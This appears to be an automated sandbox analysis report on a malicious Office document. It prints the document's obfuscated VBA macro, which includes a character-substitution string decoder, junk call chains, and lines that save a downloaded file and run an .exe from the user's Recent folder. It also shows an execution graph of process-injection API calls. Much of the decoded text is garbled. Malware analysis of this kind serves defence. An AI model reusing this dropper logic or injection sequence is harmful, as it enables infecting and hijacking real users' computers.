????????????????????5?????????????????????????????)

                                  executed
                                  68

                                  TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.SaveToFile zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT, WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf + WWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCf

                                  SaveToFile

                                  69

                                  TsKVKHBTQoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr.Close

                                  Close

                                  70

                                  Endif

                                  71

                                  xHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTg.Open (zDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBT)

                                  IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe")

                                  executed
                                  72

                                  End Sub

                                  APIsMeta Information

                                  Len

                                  Len("\M\xfffd\xfffd\xfffd\xfffdF.\xfffd\xfffd\xfffd") -> 11 Len("h\xfffd\xfffd\xfffd\xfffd://www.\xfffd\xfffd\xfffd\xfffd\xfffdm\xfffd\xfffd\xfffd.\xfffd\xfffdm/\xfffd\xfffdd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdh\xfffd\xfffd\xfffd\xfffdw\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd/zgd\xfffd\xfffdg\xfffd\xfffd\xfffdgw\xfffd\xfffd\xfffdwg\xfffd\xfffd\xfffdg\xfffd\xfffd\xfffdgg\xfffd/d\xfffdgh\xfffdg\xfffdhw\xfffd\xfffd\xfffd\xfffd\xfffd\xfffdh\xfffdgh\xfffdgh/b\xfffd\xfffd\xfffdhd\xfffdh.\xfffd\xfffd\xfffd") -> 124

                                  InStr

                                  InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","M") -> 68 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 102 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 103 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 106 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","F") -> 61 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5",".") -> 52 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 88 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 98 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","h") -> 33 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 96 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 93 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 95 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5",":") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","/") -> 0 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","w") -> 48 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 90 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 86 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","m") -> 38 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 91 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 87 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 92 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","d") -> 29 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 94 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 99 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 97 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","z") -> 51 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","g") -> 32 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\xfffd") -> 89 InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","b") -> 27

                                  Mid

                                  Mid

                                  Mid

                                  StringsDecrypted Strings
                                  " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"
                                  " \xbf\xa1@#$%^&*()_+|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"
                                  LineInstructionMeta Information
                                  18

                                  Public Function pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI)

                                  19

                                  QoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xbf\xa1\xb2\xb3\xc0\xc1\xc2\xc3\xc4\xc5\xd2\xd3\xd4\xd5\xd6\xd9\xdb\xdc\xe0\xe1\xe2\xe3\xe4\xe5\xd8\xb6\xa7\xda\xa5"

                                  executed
                                  20

                                  cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYD = " \xbf\xa1@#$%^&*()_+|01\xb2\xb3456789\xc0b\xc1d\xc2\xc3gh\xc4jklm\xc5\xd2\xd3q\xd4\xd5\xd6\xd9vw\xdb\xdcz.,-~A\xe0\xe1\xe2\xe3FGH\xe4JK\xe5MN\xd8\xb6QR\xa7T\xdaVWX\xa5Z?!23acefinoprstuxyBCDEILOPSUY"

                                  21

                                  For w = 1 To Len(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI)

                                  Len("\M\xfffd\xfffd\xfffd\xfffdF.\xfffd\xfffd\xfffd") -> 11

                                  executed
                                  22

                                  ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv = InStr(QoXiokwMNjluRzcsYfyGvbWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmr, Mid(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI, w, 1))

                                  InStr(" ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\xfffd\x0636\xfffd\x06a5","\") -> 0

                                  Mid

                                  executed
                                  23

                                  If ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv > 0 Then

                                  24

                                  bWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFU = Mid(cUcGTSjmphFUNxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYD, ctTuFzRAXHRXTgwLSUeBwZcIOiqfKGGFJvBJZAzPFIAYChfMBVLCQbJJwxXhtUpTsKVKHBTQoXiokwMNjluRzcsYfyGv, 1)

                                  Mid

                                  25

                                  NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu + bWWVbLELqQCSVYQpSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFU

                                  26

                                  Else

                                  27

                                  NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu + Mid(DepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTuFzRAXHRXTgwLSUeBwZcI, w, 1)

                                  Mid

                                  28

                                  Endif

                                  29

                                  Next

                                  Len("\M\xfffd\xfffd\xfffd\xfffdF.\xfffd\xfffd\xfffd") -> 11

                                  executed
                                  30

                                  pSxhdRmdThrZZNzbxJXFWIMnbXRkhEZyEAMPezBKUPtIbvOIyennmrcUcGTSjmphFUNxgiCfkxHdqePrNMoVnYd = NxgiCfkxHdqePrNMoVnYdDepjByUqPHDOgvQDNlgJLrLRZOuDECHflsWkjzDFxWleOwySvANKtGggHPdEYDctTu

                                  31

                                  End Function

                                  APIsMeta Information

                                  Part of subcall function nifnfzsg@ThisDocument: nil

                                  Part of subcall function nifnfzsg@ThisDocument: nil

                                  LineInstructionMeta Information
                                  113

                                  Function Yimomnh() as Double

                                  114

                                  Yimomnh = nifnfzsg

                                  115

                                  Call nifnfzsg()

                                  116

                                  End Function

                                  APIsMeta Information

                                  nil

                                  LineInstructionMeta Information
                                  119

                                  Function nifnfzsg() as Date

                                  120

                                  nifnfzsg = nil

                                  nil

                                  121

                                  Call quibvjhv()

                                  122

                                  End Function

                                  LineInstructionMeta Information
                                  9

                                  Function YOnvdf() as Byte

                                  10

                                  YOnvdf = 0

                                  11

                                  Call Eeotq()

                                  12

                                  End Function

                                  LineInstructionMeta Information
                                  13

                                  Function Eeotq() as Currency

                                  14

                                  Eeotq = 1000000000#

                                  15

                                  Call ycgftitiou()

                                  16

                                  End Function

                                  LineInstructionMeta Information
                                  78

                                  Function rgdxheg() as Integer

                                  79

                                  rgdxheg = 42

                                  80

                                  Call uvgyjbdeh()

                                  81

                                  End Function

                                  LineInstructionMeta Information
                                  82

                                  Function uvgyjbdeh() as Long

                                  83

                                  uvgyjbdeh = uvgyjbdeh

                                  84

                                  Call Qiotbdok()

                                  85

                                  End Function

                                  LineInstructionMeta Information
                                  87

                                  Function Qiotbdok() as Single

                                  88

                                  Qiotbdok = Qiotbdok

                                  89

                                  Call bdekviniot()

                                  90

                                  End Function

                                  LineInstructionMeta Information
                                  98

                                  Function tiuoty() as Boolean

                                  99

                                  tiuoty = False

                                  100

                                  Call Obvitiobb()

                                  101

                                  End Function

                                  LineInstructionMeta Information
                                  108

                                  Function tbjhjzg() as Boolean

                                  109

                                  tbjhjzg = True

                                  110

                                  Call Yimomnh()

                                  111

                                  End Function

                                  LineInstructionMeta Information
                                  75

                                  Function ycgftitiou() as Double

                                  76

                                  Call rgdxheg()

                                  77

                                  End Function

                                  LineInstructionMeta Information
                                  95

                                  Function Vionot() as Currency

                                  96

                                  Call tiuoty()

                                  97

                                  End Function

                                  LineInstructionMeta Information
                                  103

                                  Function Obvitiobb() as Single

                                  104

                                  Call tbjhjzg()

                                  105

                                  End Function

                                  LineInstructionMeta Information
                                  129

                                  Function MBFJbdjkbc() as Date

                                  130

                                  MBFJbdjkbc = 11 / 5 / 2024

                                  131

                                  End Function

                                  LineInstructionMeta Information
                                  91

                                  Function bdekviniot() as Date

                                  93

                                  End Function

                                  LineInstructionMeta Information
                                  124

                                  Function quibvjhv()

                                  126

                                  End Function

                                  LineInstructionMeta Information
                                  132

                                  Function RTgdJbdjkbc() as Single

                                  133

                                  End Function

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:26.2%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:75.2%
                                    Total number of Nodes:129
                                    Total number of Limit Nodes:0
                                    execution_graph 5125 2e9db0 5126 2e9dcc 5125->5126 5131 2ec921 5126->5131 5127 2e9ee7 5172 2ed6ba 5127->5172 5132 2ec964 5131->5132 5213 2ed478 5132->5213 5218 2ed488 5132->5218 5133 2ecb1b 5168 2ed478 2 API calls 5133->5168 5169 2ed488 2 API calls 5133->5169 5134 2ecb5f 5223 2ec458 5134->5223 5227 2ec451 5134->5227 5135 2ecbe5 5146 2ed478 2 API calls 5135->5146 5147 2ed488 2 API calls 5135->5147 5136 2ecc71 5231 2ec550 5136->5231 5235 2ec558 5136->5235 5137 2eccaf 5156 2ed478 2 API calls 5137->5156 5157 2ed488 2 API calls 5137->5157 5138 2ecdd8 5239 2ec678 5138->5239 5243 2ec670 5138->5243 5139 2ece14 5166 2ed478 2 API calls 5139->5166 5167 2ed488 2 API calls 5139->5167 5140 2ed19c 5154 2ec678 NtWriteVirtualMemory 5140->5154 5155 2ec670 NtWriteVirtualMemory 5140->5155 5141 2ed2a5 5164 2ed478 2 API calls 5141->5164 5165 2ed488 2 API calls 5141->5165 5142 2ed2f3 5247 2ec7c8 5142->5247 5251 2ec7d0 5142->5251 5143 2ed39b 5152 2ec458 NtResumeThread 5143->5152 5153 2ec451 NtResumeThread 5143->5153 5144 2ed418 5144->5127 5145 2ece73 5145->5140 5162 2ec678 NtWriteVirtualMemory 5145->5162 5163 2ec670 NtWriteVirtualMemory 5145->5163 5146->5136 5147->5136 5152->5144 5153->5144 5154->5141 5155->5141 5156->5138 5157->5138 5162->5145 5163->5145 5164->5142 5165->5142 5166->5145 5167->5145 5168->5134 5169->5134 5173 2ed6f4 5172->5173 5263 2ee208 5173->5263 5268 2ee218 5173->5268 5174 2ed8ab 5203 2ee208 2 API calls 5174->5203 5204 2ee218 2 API calls 5174->5204 5175 2ed8ef 5205 2ec458 NtResumeThread 5175->5205 5206 2ec451 NtResumeThread 5175->5206 5176 2ed975 5207 2ee208 2 API calls 5176->5207 5208 2ee218 2 API calls 5176->5208 5177 2eda01 5209 2ec558 VirtualAllocEx 5177->5209 5210 2ec550 VirtualAllocEx 5177->5210 5178 2eda3f 5189 2ee208 2 API calls 5178->5189 5190 2ee218 2 API calls 5178->5190 5179 2edb68 5193 2ec678 NtWriteVirtualMemory 5179->5193 5194 2ec670 NtWriteVirtualMemory 5179->5194 5180 2edba4 5201 2ee208 2 API calls 5180->5201 5202 2ee218 2 API calls 5180->5202 5181 2edf2c 5191 2ec678 NtWriteVirtualMemory 5181->5191 5192 2ec670 NtWriteVirtualMemory 5181->5192 5182 2ee035 5199 2ee208 2 API calls 5182->5199 5200 2ee218 2 API calls 5182->5200 5183 2ee083 5211 2ec7c8 NtSetContextThread 5183->5211 5212 2ec7d0 NtSetContextThread 5183->5212 5184 2ee12b 5187 2ec458 NtResumeThread 5184->5187 5188 2ec451 NtResumeThread 5184->5188 5185 2e9f49 5186 2edc03 5186->5181 5195 2ec678 NtWriteVirtualMemory 5186->5195 5196 2ec670 NtWriteVirtualMemory 5186->5196 5187->5185 5188->5185 5189->5179 5190->5179 5191->5182 5192->5182 5193->5180 5194->5180 5195->5186 5196->5186 5199->5183 5200->5183 5201->5186 5202->5186 5203->5175 5204->5175 5205->5176 5206->5176 5207->5177 5208->5177 5209->5178 5210->5178 5211->5184 5212->5184 5214 2ed488 5213->5214 5255 2ec328 5214->5255 5259 2ec320 5214->5259 5215 2ed561 5215->5133 5219 2ed4ac 5218->5219 5221 2ec328 NtReadVirtualMemory 5219->5221 5222 2ec320 NtReadVirtualMemory 5219->5222 5220 2ed561 5220->5133 5221->5220 5222->5220 5224 2ec49c NtResumeThread 5223->5224 5226 2ec4f3 5224->5226 5226->5135 5228 2ec49c NtResumeThread 5227->5228 5230 2ec4f3 5228->5230 5230->5135 5232 2ec59c VirtualAllocEx 5231->5232 5234 2ec614 5232->5234 5234->5137 5236 2ec59c VirtualAllocEx 5235->5236 5238 2ec614 5236->5238 5238->5137 5240 2ec6c1 NtWriteVirtualMemory 5239->5240 5242 2ec75a 5240->5242 5242->5139 5244 2ec6c1 NtWriteVirtualMemory 5243->5244 5246 2ec75a 5244->5246 5246->5139 5248 2ec819 NtSetContextThread 5247->5248 5250 2ec891 5248->5250 5250->5143 5252 2ec819 NtSetContextThread 5251->5252 5254 2ec891 5252->5254 5254->5143 5256 2ec374 NtReadVirtualMemory 5255->5256 5258 2ec3ec 5256->5258 5258->5215 5260 2ec374 NtReadVirtualMemory 5259->5260 5262 2ec3ec 5260->5262 5262->5215 5264 2ee218 5263->5264 5266 2ec328 NtReadVirtualMemory 5264->5266 5267 2ec320 NtReadVirtualMemory 5264->5267 5265 2ee2f1 5265->5174 5266->5265 5267->5265 5269 2ee23c 5268->5269 5271 2ec328 NtReadVirtualMemory 5269->5271 5272 2ec320 NtReadVirtualMemory 5269->5272 5270 2ee2f1 5270->5174 5271->5270 5272->5270 5273 2eb870 5275 2eb900 CreateProcessW 5273->5275 5276 2ebcd4 5275->5276 5277 2ebe50 5278 2ebe74 5277->5278 5280 2ec328 NtReadVirtualMemory 5278->5280 5281 2ec320 NtReadVirtualMemory 5278->5281 5279 2ebf29 5280->5279 5281->5279

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
